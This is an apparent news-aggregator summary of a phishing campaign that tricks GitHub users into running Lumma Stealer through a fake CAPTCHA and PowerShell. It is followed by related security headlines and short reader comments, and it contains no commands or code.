Windows PowerShell Phish Has Scary Potential
A phishing campaign targeting GitHub users employs deceptive emails about security vulnerabilities, using a CAPTCHA to execute Lumma Stealer malware via Windows PowerShell, posing risks to less experienced users.
Read original article
A recent phishing campaign targeting GitHub users has raised concerns due to its sophisticated use of Windows PowerShell to deliver malware. The phishing emails, which appear to come from GitHub's security team, warn recipients about vulnerabilities in their repositories and direct them to a malicious link. Upon visiting the link, users are prompted to complete a CAPTCHA that involves pressing specific key combinations. This sequence opens the Windows "Run" prompt and executes a command that downloads a password-stealing malware known as Lumma Stealer. While experienced programmers are likely to recognize the scam, less tech-savvy users may fall victim to this tactic. The article highlights the potential for this phishing method to evolve and suggests that Microsoft should consider restricting PowerShell access for average users to mitigate risks. However, Microsoft advises against disabling PowerShell due to its importance in system operations. The article concludes by emphasizing the need for awareness among less knowledgeable Windows users regarding such phishing attempts.
- A phishing campaign is targeting GitHub users with emails about security vulnerabilities.
- The scam uses a CAPTCHA that tricks users into executing malware via Windows PowerShell.
- The malware, Lumma Stealer, is designed to steal stored credentials from victims' PCs.
- Experienced users are less likely to fall for the scam, but less tech-savvy individuals are at risk.
- There are calls for Microsoft to consider restricting PowerShell access for average users to enhance security.
Related
A Hacker 'Ghost' Network Is Quietly Spreading Malware on GitHub
Cybersecurity researchers discovered a network of 3,000 fake GitHub accounts, "Stargazer Goblin," spreading malware like ransomware. The operation manipulates GitHub tools, targeting Windows users seeking free software.
Hackers bypass Windows SmartScreen flaw to launch malware
Cybercriminals are exploiting a Microsoft Defender vulnerability (CVE-2024-21412) to install malware undetected. Many systems remain unpatched, making them vulnerable. Users should update Windows and be cautious with email attachments.
A Hacker 'Ghost' Network Is Quietly Spreading Malware on GitHub
Cybersecurity researchers discovered a network of 3,000 fake GitHub accounts, "Stargazer Goblin," spreading malware like ransomware. The network manipulates GitHub's tools to promote malicious repositories targeting Windows users.
Nefarious actors attack from 3k shadow GitHub accounts, spreading malware
A cybercriminal network, Stargazer Goblin, uses 3,000 ghost accounts on GitHub to spread malware disguised as legitimate software, generating up to $100,000 while evading detection amid GitHub's vast user base.
GitHub Notification Emails Hijacked to Send Malware
A security incident reveals that GitHub notification emails can be hijacked to distribute malware, specifically "LUMMASTEALER," which targets sensitive information. Recommendations include improving email clarity and security measures.
5 commentsChrome at least requires a prompt for reading clipboard contents, which is apparently "diverting from the specifications"!
Who came up with this? Why is every feature in web browsers and javascript built in the dumbest way possible? At least in Win32 when it says "you should only touch the clipboard on request from the user" they have the excuse that it was 1995 and there was very little information to muck with or steal on the average computer! Even then they still worked towards hardening the functionality.
Web browsers implemented this in 2018!
So, are these malware scripts signed, has MS relaxed the default PS policy, do users relax it, or has this malware found another way around it?
Related
A Hacker 'Ghost' Network Is Quietly Spreading Malware on GitHub
Cybersecurity researchers discovered a network of 3,000 fake GitHub accounts, "Stargazer Goblin," spreading malware like ransomware. The operation manipulates GitHub tools, targeting Windows users seeking free software.
Hackers bypass Windows SmartScreen flaw to launch malware
Cybercriminals are exploiting a Microsoft Defender vulnerability (CVE-2024-21412) to install malware undetected. Many systems remain unpatched, making them vulnerable. Users should update Windows and be cautious with email attachments.
A Hacker 'Ghost' Network Is Quietly Spreading Malware on GitHub
Cybersecurity researchers discovered a network of 3,000 fake GitHub accounts, "Stargazer Goblin," spreading malware like ransomware. The network manipulates GitHub's tools to promote malicious repositories targeting Windows users.
Nefarious actors attack from 3k shadow GitHub accounts, spreading malware
A cybercriminal network, Stargazer Goblin, uses 3,000 ghost accounts on GitHub to spread malware disguised as legitimate software, generating up to $100,000 while evading detection amid GitHub's vast user base.
GitHub Notification Emails Hijacked to Send Malware
A security incident reveals that GitHub notification emails can be hijacked to distribute malware, specifically "LUMMASTEALER," which targets sensitive information. Recommendations include improving email clarity and security measures.